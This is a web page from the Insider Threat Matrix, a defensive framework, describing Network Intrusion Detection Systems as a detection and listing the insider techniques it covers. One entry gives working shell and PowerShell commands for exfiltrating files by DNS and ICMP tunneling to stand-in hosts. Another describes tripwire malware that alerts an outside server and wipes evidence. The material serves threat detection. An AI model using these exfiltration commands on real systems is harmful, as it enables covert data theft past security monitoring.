ITM is an open framework - Submit your contributions now.

Detections

ConsoleHost_history.txt Created Timestamp Discrepancy

ConsoleHost_history.txt File Missing

Windows File Deleted, Event Logs

Windows System Logging was Cleared

Print Spooler Service

Installed Printers via Registry

Printed Documents via Event Logs

Tamper Seal

Cyber Deception, File Canary

Cyber Deception, Honeypot

Cyber Deception, Honey User

Windows Operating System Installed Date

NTFS Timestamp Discrepancy

Utilize Cold Storage for Logs

Windows Local Account Deleted

Windows System Shutdown, Event Logs

Firefox Browser History

Edge Browser History

Chrome Browser History

Shellbags, USB Removable Storage

USBSTOR Registry Key

USB Registry Key

MountedDevices Registry Key

Windows Event Log, DriverFrameworks-UserMode

Windows Setupapi.dev.log

Windows LNK Files

Windows Prefetch

File Metadata

File EXIF Data

auditd Timestamp Modification Rule

Windows Thumbcache

Closed-Circuit Television

Terminal Service Client Registry Key

RDP Bitmap Cache

Windows Jump Lists

auditd File Access

Windows Recycle Bin

Web Proxy Logs

Microsoft Exchange Message Trace

Email Gateway

Network Intrusion Detection Systems

Sysmon Process Create Event

Linux dpkg Log

Agent Capable of User Activity Monitoring

Agent Capable of Endpoint Detection and Response

Agent Capable of User Behaviour Analytics

Data Loss Prevention Solution

Social Media Monitoring

Impossible Travel

DNS Logging

Audit Logging

Missing .bash_history File

.bash_history Timestamp Discrepency

PowerShell Logging

User Account Deleted, Windows Event Log

Chrome Browser Cookies

Chrome Browser Login Data

Chrome Browser Bookmarks

Chrome Browser Extensions

Notepad.exe TabState

Microsoft 365 Admin Center Sign-in Activity

Microsoft Entra ID Sign-in Logs

AWS CloudTrail, Resource Deletion

GCP Cloud Audit Logs, Resource Deletion

Azure Activity Log, Resource Deletion

Financial Auditing

Windows Event Log, Logon and Logoff

Security Software Anti-Tampering Alerts

Windows Event Log, Local Firewall Changes

Map Network Drive MRU

TypedPaths

Network Registry Key

Shellbags, Network Drives

USB MountPoints2

Bash History

AzureAD PowerShell Log

Clipboard Payloads via ActivitiesCache.db

MFT Entry Number Sequence Irregularities

MFT Unusual Timestamp Patterns

MFT and Shimcache Executable Timestamp Comparison

Microsoft Unified Audit Log

Windows Event Log, Software Uninstallation

DNS Monitoring

Deep Packet Inspection

NetFlow Analysis

Windows Event Log, Audit Removable Storage

Virtual Private Network (VPN) Logs

User Behavior Analytics (UBA)

User and Entity Behavior Analytics (UEBA)

Photographic Identification Comparison

Leaver Watchlist

vssadmin Shadow Copy Deletion

Microsoft Entra ID Privileged Identity Management Resource Audit

Microsoft Teams Admin Center Meeting and Call History

macOS File System Events (FSEvents) Store Database

Windows Event Log, System Time Modification

MIP Label Activity Monitoring

Cyber Deception, Honey SPN

Asset Discovery Audit

Tracking Patterns of Policy Violations

Baseline System Performance Profiling

AWS Unauthorized System or Service Modification

GCP Unauthorized System or Service Modification

Azure Unauthorized System or Service Modification

OCI Unauthorized System or Service Modification

SystemPropertiesRemote.exe Execution

Modification of RDP Registry Keys

RDP Group Membership Changes

DNS and HTTPS Traffic to Web-Based Remote Access Platforms

Access to /mnt/c/ from Within WSL

Installation of New WSL Distributions

Threat Intelligence Feeds for Insider Threat Indicators

Registry Value Audit, Start_TrackProgs

Absence of Expected Entries in RunMRU and UserAssist

Microsoft Purview eDiscovery

Snipping Tool Cached Screenshots

Snipping Tool TempState\Snips

Snipping Tool Cached Recordings

Snipping Tool TempState\Recordings

Snipping Tool Autosave Setting Modification

Python History File

OneDrive SafeDelete.db

Discrepancies Between Physical Access Logs and System Authentication

Modification of etc/hosts File

Microsoft Defender, Printed File

Microsoft Defender, Creation of Forwarding/Redirect Rule

Microsoft Defender, Granted Mailbox Permission

Microsoft Defender, Shared File Externally

Automated Visual and Thermal Baseline Scanning of Server Environments

Asset Register Correlation

ID: DT042
Created: 01st June 2024
Updated: 01st June 2024
Contributor: The ITM Team

Network Intrusion Detection Systems

Network Intrusion Detection Systems (NIDS) can alert on abnormal, suspicious, or malicious patterns of network behavior.

Sections

ID	Name	Description
IF011	Providing Access to a Unauthorized Third Party	A subject intentionally provides system or data access to a third party that is not authorized to access it.
ME006	Web Access	A subject can access the web with an organization device.
ME009	FTP Servers	A subject is able to access external FTP servers.
PR021	Network Scanning	A subject conducts a scan of a network to identify additional systems, or services running on those systems.
IF020	Unauthorized VPN Client	The subject installs and uses an unapproved VPN client, potentially violating organizational policy. By using a VPN service not controlled by the organization, the subject can bypass security controls, reducing the security team’s visibility into network activity conducted through the unauthorized VPN. This could lead to significant security risks, as monitoring and detection mechanisms are circumvented.
PR007	CCTV Enumeration	The subject enumerates organizational CCTV coverage through physical reconnaissance, network-based probing, or a combination of both. This behavior aims to identify surveillance blind spots, coverage patterns, and system weaknesses in order to plan insider activity such as unauthorized entry, covert data removal, or sabotage. Physical enumeration involves walking routes to observe camera placement, photographing or sketching locations, and identifying fields of view, blind spots, or coverage overlaps. Subjects may test movement within blind zones or note environmental features (e.g., pillars, furniture) that obstruct visibility. Network enumeration targets digital surveillance systems, including IP cameras, DVRs, NVRs, and PoE switches. Subjects may scan for active devices, query configurations, or attempt login with default credentials to discover camera IPs, firmware details, and accessible streams. When combined, physical and network enumeration provide a sophisticated map of surveillance infrastructure. For example, a subject may confirm camera placement through on-site observation, then validate viewing angles and live coverage zones by remotely accessing the corresponding camera feeds across the network. This dual approach allows the subject to identify exact surveillance gaps, test whether specific areas are monitored, and plan movement or concealment with high confidence. This behavior is a strong indicator of deliberate preparation, as it requires technical effort, situational awareness, and intent to circumvent organizational surveillance.
IF011.001	Intentionally Weakening Network Security Controls For a Third Party	The subject intentionally weakens or bypasses network security controls for a third party, such as providing credentials or disabling security controls.
IF004.005	Exfiltration via Protocol Tunneling	A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination. DNS Tunneling (Linux) A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux: Prerequisites: A domain the subject controls or can use for DNS queries. A DNS server to receive and decode the DNS queries. Steps: 1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt: `xxd -p secret.txt > secret.txt.hex` 2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters): `split -b 32 secret.txt.hex hexpart_` 3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of example.com in a TXT record query: `for part in hexpart_; do` `h=$(cat $part)` `dig txt $h.example.com` `done` On the target DNS server that they control, the subject captures the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query. DNS Tunneling (Windows)* A simple example of how DNS tunneling might be achieved with PowerShell in Windows: Prerequisites: A the subject you controls. A DNS server or a script on the subjects server to capture and decode the DNS queries. Steps: 1. The subject converts the sensitive file to hex: `$filePath = "C:\path\to\your\secret.txt"` `$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''` 2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters): `$chunkSize = 32` `$chunks = $hexContent -split "(.{$chunkSize})" \| Where-Object { $_ -ne "" }` 3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of example.com in a TXT record query: `$domain = "example.com"` `foreach ($chunk in $chunks) {` `$query = "$chunk.$domain"` `Resolve-DnsName -Name $query -Type TXT` `}` The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query. ICMP Tunneling (Linux) A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux: Prerequisites: The subject has access to a server that can receive and process ICMP packets. The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions). Steps: 1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt: `xxd -p secret.txt > secret.txt.hex` 2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks: `split -b 32 secret.txt.hex hexpart_` 3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload: `DESTINATION_IP="subject_server_ip"` `for part in hexpart_*; do` `h=$(cat $part)` `ping -c 1 -p "$h" $DESTINATION_IP` `done` The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled the hex data.
AF018.001	Endpoint Tripwires	A subject installs custom software or malware on an endpoint, potentially disguising it as a legitimate process. This software includes tripwire logic to monitor the system for signs of security activity. The tripwire software monitors various aspects of the endpoint to detect potential investigations: Security Tool Detection: It scans running processes and monitors new files or services for signatures of known security tools, such as antivirus programs, forensic tools, and Endpoint Detection and Response (EDR) systems. File and System Access: It tracks access to critical files or system directories (e.g., system logs, registry entries) commonly accessed during security investigations. Attempts to open or read sensitive files can trigger an alert. Network Traffic Analysis: The software analyzes network traffic to identify unusual patterns, including connections to Security Operations Centers (SOC) or the blocking of command-and-control servers by network security controls. User and System Behavior: It observes system behavior and monitors logs (such as event logs) that indicate an investigation is in progress, such as switching to an administrative account or modifying security settings (e.g., enabling disk encryption, changing firewall rules). Upon detecting security activity, the tripwire can initiate various evasive responses: Alert the Subject: It covertly sends an alert to an external server controlled by the subject, using common system tools (e.g., `curl`, `wget`, or HTTP requests). Modify Endpoint Behavior: It can terminate malicious processes, erase evidence (e.g., logs, browser history, specific files), or restore system and network configurations to conceal signs of tampering.
IF026.001	Internal Denial of Service	The subject initiates actions that degrade, overwhelm, or disable internal services, applications, or systems, denying legitimate access. These incidents may involve: Excessive or malformed queries to internal databases Overuse of automated scripts against internal APIs or systems Misconfiguration or manual tampering with internal service dependencies (e.g., message queues, schedulers) Saturation of internal network bandwidth or I/O on shared infrastructure